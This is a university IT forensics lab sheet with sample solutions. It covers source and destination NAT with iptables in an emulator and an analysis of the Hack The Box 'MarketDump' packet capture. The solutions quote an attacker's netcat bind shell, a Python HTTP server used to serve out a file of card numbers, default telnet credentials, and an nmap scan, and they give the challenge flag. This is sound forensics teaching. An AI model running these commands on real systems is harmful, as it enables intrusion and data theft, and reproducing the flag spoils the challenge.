IT Forensics
Lab Week 8 Sample Solutions
IT Forensics Tutorial 8
Topics:
• Network Forensics Tools
– Wireshark
• Network Security Device
– Firewall
– Source and Destination NAT
Covered Learning Outcomes:
• explain the motivations and landscape of network forensic investigations in an IT context
• become familiar with some of the network forensic tools
• deduce information and explain the events from captured traffic in a network forensic investigation
Instructions:
• Individual and group activities.
Files and access required:
• For this week’s activity you need an account on https://www.hackthebox.eu. In order to join hackthebox
you need to solve a hacking riddle. Give it a try however if you find it too difficult, there are guides and videos
available online.
• lu16d-coremu-v1.3.ova virtual machine (username: muni and password: muni) available via:
– https://cloudstor.aarnet.edu.au/plus/s/vhxKjdq5Jmk8Fis
– See Appendix A for instruction on importing and setting up the VM
Activity A - Understanding Source and Destination NAT
Make sure you have setup a shared folder between your host (laptop or PC) and the Lubuntu virtual machine. Down�
load the IT_Forensics_w8.imn file from moodle. This file is a CORE Network Emulator (henceforth core) configu�
ration file. Start the Lubuntu virtual machine, open core, and from the File menu open the IT_Forensics_w8.imn
file from the mounted shared folder inside the VM. In this setup nsargos is the Authoritative Name Server for the
domain argos.edu. The node sphinx is the Authoritative Name Server for the domain delos.edu. The node
Internet serves as a DNS Cache Resolver between the two aforementioned domains
Tasks
1. Run the emulation and open a Wireshark window on the eth0 interface of the node Internet (right click,
move mouse over Wireshark and select eth0), another Wireshark window on eth1 interface of the node
phoenix, and the final Wirehark window on the eth0 interface of the node selene. Open a terminal on the
node selene and type the following command:
lynx www.delos.edu
Stop the capture in all three Wireshark windows. You can save these files for further analysis.
a) Open a terminal on node Internet and execute the following command:
1IT Forensics
Lab Week 8 Sample Solutions
ip route
Dose this node have any routes for the networks behind the node phoenix?
No, the routing entries are as follows with no entries for 10.1.1.0/24 or 10.1.2.0/24
10.0.3.0/24 dev eth1
proto kernel
scope link
src 10.0.3.1
10.1.3.0/24 dev eth0
proto kernel
scope link
src 10.1.3.1
172.16.1.0/24 via 10.0.3.2 dev eth1
192.168.1.0/24 via 10.0.3.2 dev eth1
b) Observe the packets captured in all three Wireshark windows and explain how the node selene is able to
visit the page hosted on the node wwwdelos. Can you make sense of this process? (Hint: some sort of NAT
is being performed)
First the name www.delos.edu must be resolved to an IP address. The DNS request is sent from selene
to nsargos. nsargos forwards a query to Internet node which is also running a DNS server, a DNS
cache resolver. When the forwarded request passes through phoenix it matches a defined Source NAT
rule and its source IP address changes from 10.1.2.10 to 10.1.3.45 and a random port number which
differs from the original port number used by nsargos. The resolver then responds with the requested IP
address (performs a forward to node sphinx but that is not of interest here). In this response the destination
IP address is changed from 10.1.3.45 to 10.1.2.10.
After the name is resolved the client makes a TCP SYN request to 172.16.1.11 from its internal IP ad�
dress range (10.1.1.31 or 10.1.1.32). This request when passing through phoenix is matched with
another Source NAT rule which changes the source address to a random address in the range 10.1.3.50
10.1.3.51. Similar to the DNS request, the port number of the SNAT request is randomly selected and
differs from the client’s SYN request that enters through eth0 interface of the node phoenix.
2. Close or minimise the Wireshark windows from previous sub task. Open a Wireshark window on eth0 in�
terface of the node Internet, and a second window on the eth1 interface of the node phoenix. Open a
terminal on the node apollo and enter the following command:
lynx www.argos.edu
a) Observe the packets in the two Wireshark windows and explain how the node apollo is able to visit the
page hosted on the node wwwargos. Can you make sense of this process? (Hint: some sort of NAT is
being performed)
You can save these files for further analysis.
First the name www.argos.edu must be resolved. The node sphinx forwards the request from apollo
to Internet which will forward it to nsargos. Here there is a Destination NAT which maps the DMZ
address 10.1.2.10 for UDP port 53 to 10.1.3.40 UDP port 53. Hence the request from Internet is sent
to 10.1.3.40. That is from any node outside the Argos network the DNS server of this network has the
IP address 10.1.3.40. This request when arrives on phoenix is matched with a DNAT rule and is sent
2IT Forensics
Lab Week 8 Sample Solutions
to nsargos with destination address changed to 10.1.2.10. The nsargos responds and the response
passes through phoenix and its source address changes to 10.1.3.40.
The client apollo then sends a TCP SYN request to 10.1.3.40 port 80. Again this request matches
another DNAT rule on phoenix which maps this address-port combination to 10.1.2.11:80 address:port.
The destination address is changed by phoenix and the packet is sent out eth1 interface. The response
comes back from wwwargos node and when passing through phoenix its source address is changed to
10.1.3.40. This process continues for all the packets that flow back and forth between apollo and www�
argos
3. Stop the emulation, open the configuration window of the node phoenix, then locate Firewall service, click
on the wrench icon to open the edit window. You will find 11 sets of commands. For each set briefly explain
the purpose of the set of commands.
Solution
#!/bin/bash
# Set 1: Setting Filtering policy
iptables P INPUT DROP
iptables P OUTPUT DROP
iptables P FORWARD DROP
# Set 2: IP address for Destination NAT
ip address add 10.1.3.40/24 dev eth2
# Set 3: IP address for Source NAT of DMZ servers
ip address add 10.1.3.45/24 dev eth2
# Set 4: IP addresses for source NAT of internal clients
ip address add 10.1.3.50/24 dev eth2
ip address add 10.1.3.51/24 dev eth2
ip address add 10.1.3.52/24 dev eth2
ip address add 10.1.3.53/24 dev eth2
ip address add 10.1.3.54/24 dev eth2
ip address add 10.1.3.55/24 dev eth2
# Set 5: Source NAT rule for DMZ servers
iptables t nat A POSTROUTING o eth2 p ip s 10.1.2.0/24 j SNAT tosource 10.1.3.45 randomfully
# Set 6: Stateful inspection for DMZ dns server as a client forwarding requests to Internet dns cache resolver
iptables A FORWARD s 10.1.2.10 d 10.1.3.1 p udp dport 53 m state state NEW,ESTABLISHED j ACCEPT
iptables A FORWARD d 10.1.2.10 s 10.1.3.1 p udp sport 53 m state state ESTABLISHED j ACCEPT
3IT Forensics
Lab Week 8 Sample Solutions
# Set 7: Stateful inspection for DMZ mail server as a client sending SMTP mail to any other mail server
iptables A FORWARD s 10.1.2.12 p tcp dport 25 m state state NEW,ESTABLISHED j ACCEPT
iptables A FORWARD d 10.1.2.12 p tcp sport 25 m state state ESTABLISHED j ACCEPT
# Set 8: Source NAT rule for internal clients
iptables t nat A POSTROUTING o eth2 p ip s 10.1.1.0/24 j SNAT tosource 10.1.3.5010.1.3.55 randomfully persistent
# Set 9: Stateful inspection for internal to anywhere
iptables A FORWARD i eth0 s 10.1.1.0/24 p ip m state state NEW,ESTABLISHED j ACCEPT
iptables A FORWARD o eth0 d 10.1.1.0/24 p ip m state state ESTABLISHED j ACCEPT
# Set 10: Destination NAT rules for dns, web, and mail
iptables t nat A PREROUTING i eth2 p udp d 10.1.3.40 dport 53 j DNAT todestination 10.1.2.10
iptables t nat A PREROUTING i eth2 p tcp d 10.1.3.40 dport 80 j DNAT todestination 10.1.2.11
iptables t nat A PREROUTING i eth2 p tcp d 10.1.3.40 dport 25 j DNAT todestination 10.1.2.12
# Set 11: Stateful inspection of DMZ servers serving the internet
# DNS
iptables A FORWARD i eth2 d 10.1.2.10 p udp dport 53 m state state NEW,ESTABLISHED j ACCEPT
iptables A FORWARD i eth1 s 10.1.2.10 p udp sport 53 m state state ESTABLISHED j ACCEPT
# Web
iptables A FORWARD i eth2 d 10.1.2.11 p tcp dport 80 m state state NEW,ESTABLISHED j ACCEPT
iptables A FORWARD i eth1 s 10.1.2.11 p tcp sport 80 m state state ESTABLISHED j ACCEPT
# Mail
iptables A FORWARD i eth2 d 10.1.2.12 p tcp dport 25 m state state NEW,ESTABLISHED j ACCEPT
iptables A FORWARD i eth1 s 10.1.2.12 p tcp sport 25 m state state ESTABLISHED j ACCEPT
4. Does Source and Destination NAT have any relevance to network forensics investigations?
Yes, if Source and Destination NAT is performed the ultimate source or destination of a network packet may
be different from what is observed in captured traffic which needs to be taken into consideration as there
maybe multiple potential sources for a given packet. It may be required to look for any potential log of Source
NAT to find out the original IP address of a captured packet. If no log exist then this fact must be considered
in evaluating the weight of evidence.
5. Install nmap tool using the following command:
sudo apt install nmap
Run the configuration. Open a Wireshark window on interface eth2 of the node phoenix. Perform a port scan
operation from the node apollo for the address range 10.1.3.40 to 10.1.3.60. Share you observations with
the class.
nmap is a port scanning tool. It has some detection mechanisms to also detect/guess the OS and application
based on the responses it receives and open ports it finds. We can control the extent of the probe that nmap
4IT Forensics
Lab Week 8 Sample Solutions
performs. For this activity we are only interested in captured traffic to become familiar with the effect of this
tool and its traces in network forensics.
nmap A T4 10.1.3.4060
Activity B
Log in to your account on https://www.hackthebox.eu inside the VM and click on Labs (on the left pane) then
Challenges, and then click on Forensics and open MarketDump challenge.
Figure 1: Log in to hackthebox and navigate to Labs → Challenges → Forensics → MarketDump
Read the description of the challenge and then download the zip file and extract the packet capture file. The
password for the zip file is hackthebox. Open the pcap file in Wireshark.
5IT Forensics
Lab Week 8 Sample Solutions
Figure 2: MarketDump challenge description and file download
Tasks
1. Can you explain how the attacker has identified a vulnerability in the target machine?
The attacker starts with scanning the target using nmap which is evident from the large number of TCP
SYN requests to many ports followed by many TCP RST and few established connections revealing
open ports on the target machine. The nmap signature scan can also be found in frame 2357 with GET
/nmaplowercheck1531136698 HTTP/1.1
2. Can you identify the services running on the target machine? Try a display filter that shows server’s TCP SYN
+ ACK response. Check out Building Display Filters for more advanced filters.
putting a filter such as ip.src == 10.0.2.15 and tcp.flags.syn and tcp.ack == 1 will show
the server’s response to port scan by sending back SYN ACK identifying the open ports: 22 (SSH), 53
(DNS), 3306 (MySQL), 80 (Web), 5432 (PostgreSQL), 631 (Internet Printing Protocol),
3. List all the TCP and UDP communications between the attacker and the server (Menu bar → Statistics →
Conversations). Observe each TCP stream and identify interesting connections (from bytes exchanged).
4. Identify the protocol used by attacker to gain access to the server (identify the TCP Stream).
Telnet, tcp.stream eq 1053 as display filter and then follow TCP stream shows the following:
6IT Forensics
Lab Week 8 Sample Solutions
USER: admin
PASS: admin
Welcome, admin
Here is you're daily stock report!
PRODUCT PRICE
STOCK
SHIRTS
20$
50
JEANS
40$
99
WALLETS 15$
19
SOCKS
10$
100
Type exit to exit the program: exit
5. What program and command the attacker uses for persistent access to the server?
the NetCat program and the command used is: nc.traditional lvp 9999 e /bin/bash, which
has the e option allowing a program to be launched remotely (as opposed to nc.openbsd)
6. List all the commands the attacker has used after establishing a persistent connection.
commands and their outputs
ls la
total 344
drwxrxrx 2 vigil vigil
4096 Jul
9 13:42 .
drwxrxrx 6 root
root
4096 Jul
9 13:38 ..
rwxrxrx 1 vigil vigil 339920 Jul
9 13:24 costumers.sql
rwxrxrx 1 vigil vigil
593 Jul
9 13:14 login.sh
pw
pwd
/var/www/html/MarketDump
ls la
total 344
drwxrxrx 2 vigil vigil
4096 Jul
9 13:42 .
drwxrxrx 6 root
root
4096 Jul
9 13:38 ..
rwxrxrx 1 vigil vigil 339920 Jul
9 13:24 costumers.sql
rwxrxrx 1 vigil vigil
593 Jul
9 13:14 login.sh
whoami
root
wc l costumers.sql
10302 costumers.sql
ls la
total 344
drwxrxrx 2 vigil vigil
4096 Jul
9 13:55 .
drwxrxrx 6 root
root
4096 Jul
9 13:38 ..
7IT Forensics
Lab Week 8 Sample Solutions
rwxrxrx 1 vigil vigil 333845 Jul
9 13:55 costumers.sql
rwrr 1 root
root
1024 Jul
9 13:55 .costumers.sql.swp
rwxrxrx 1 vigil vigil
593 Jul
9 13:14 login.sh
head n2 costumers.sql
IssuingNetwork,CardNumber
American Express,377815700308782
cp costumers.sql /tmp/
cd /tmp
ls
configerrlU04xV
costumers.sql
mozilla_vigil0
snap.1000_telegramdesktop_0UDXXk
ssh8jVN4Kyx3X69
systemdprivate9ac4f21175984888b953531b43a88a47apache2.servicelIsVqD
systemdprivate9ac4f21175984888b953531b43a88a47bolt.serviceFd1LWs
systemdprivate9ac4f21175984888b953531b43a88a47colord.servicerdNsnK
systemdprivate9ac4f21175984888b953531b43a88a47fwupd.service3d8iRg
systemdprivate9ac4f21175984888b953531b43a88a47rtkitdaemon.servicepzu6lE
systemdprivate9ac4f21175984888b953531b43a88a47systemdresolved.serviceZtjIX4
systemdprivate9ac4f21175984888b953531b43a88a47systemdtimesyncd.service0BNKmh
Tempbf8572b56aac4c1daff6063f56964ecb
python m SimpleHTTPServer 9998
cat costumers.sql
IssuingNetwork,CardNumber
American Express,377815700308782
American Express,372184234300624
snip
7. Identify the flag of the challenge. To decode the flag go to https://gchq.github.io/CyberChef and select Magic
from operations and paste the flag as Input and click on Bake.
the flag
NVCijF7n6peM7a7yLYPZrPgHmWUHi97LCAzXxSEUraKme
and the decoded flag:
HTB{DonTRuNAsRoOt!MESsEdUpMarket}
Appendix A - Setup VM
Download and Install VirtualBox
• Download the VirtualBox from https://www.virtualbox.org. It is available for all three major platforms:
Windows, macOS, and Linux.
• Follow the installation instructions for your operating system.
• Download the VirtualBox Oracle VM VirtualBox Extension Pack from the same web page (the file is read by
VirtualBox and is the same for all platforms).
8IT Forensics
Lab Week 8 Sample Solutions
• Install the Extension Pack after you have successfully installed the VirtualBox. To install simply double-click
it and it should open in VirtualBox dialogue and prompt for approval.
As VirtualBox installs various system drivers it will ask for administrative privileges.
Download and Import Prepared Virtual Machine
The VM contains required software used in lab exercises and or assignments. One such tool is the Core Network
Emulator which allows to mimic complex network scenarios without the need for accessing physical equipment.
In exercises related to operating system we can safely perform tasks which are contained in the VM without ac�
cidentally changing the state of the operating system that runs our physical machine. It also allows us to provide
universal instructions and exercises that would work the same way for all students as they will be run within the
VM.
• Download the VM file: lu16d-coremu-v1.3.ova
– https://cloudstor.aarnet.edu.au/plus/s/vhxKjdq5Jmk8Fis
• The file is about 2.6 GB so it may take some time to download.
• There are two ways to import the file into VirtualBox:
– Simply double click on the file and a dialogue box from VirtualBox should open up that will guide you
through the importing process.
– Open VirtualBox and then from the Menu Bar: File → Import Appliance → Browse (find the file
using the OS file browser) → Continue → Import.
Set up a Shared Folder between VM and the Host
In this step you will configure a folder on your host machine (OS running on your physical device) to be shared with
the VM (guest which runs a flavour/distribution of Linux). We can use the shared folder to transfer files between
the host and guest.
1. Open VBox and select the imported VM (in Section-)
2. Right click on the VM and select Settings as shown in Figure-3
Figure 3: VM Settings - Method 1
An alternative approach is to select the VM and then click on the settings icon in the tools panel (Figure-4).
Figure 4: VM Settings - Method 2
9IT Forensics
Lab Week 8 Sample Solutions
3. Click on the Shared Folder icon in the settings window, then click on the folder icon with a green plus on the
right side of the window to add a new shared folder (Figure-5)
Figure 5: Adding a new shared folder
4. From the Folder Path in the opened window click on the drop down icon and select Other which will open the
OS file browser to select a folder on your host machine to be shared with the VM. After selecting the folder
check the Auto-mount option to make sure it will be mounted every time the VM is booted (the shared folder
is presented as a network attached storage to the VM). Figure-6 shows my chosen Folder Path and Folder
Name as well as the Auto-mount option.
10IT Forensics
Lab Week 8 Sample Solutions
Figure 6: Selecting the shared folder and checking the Auto-mount option
11
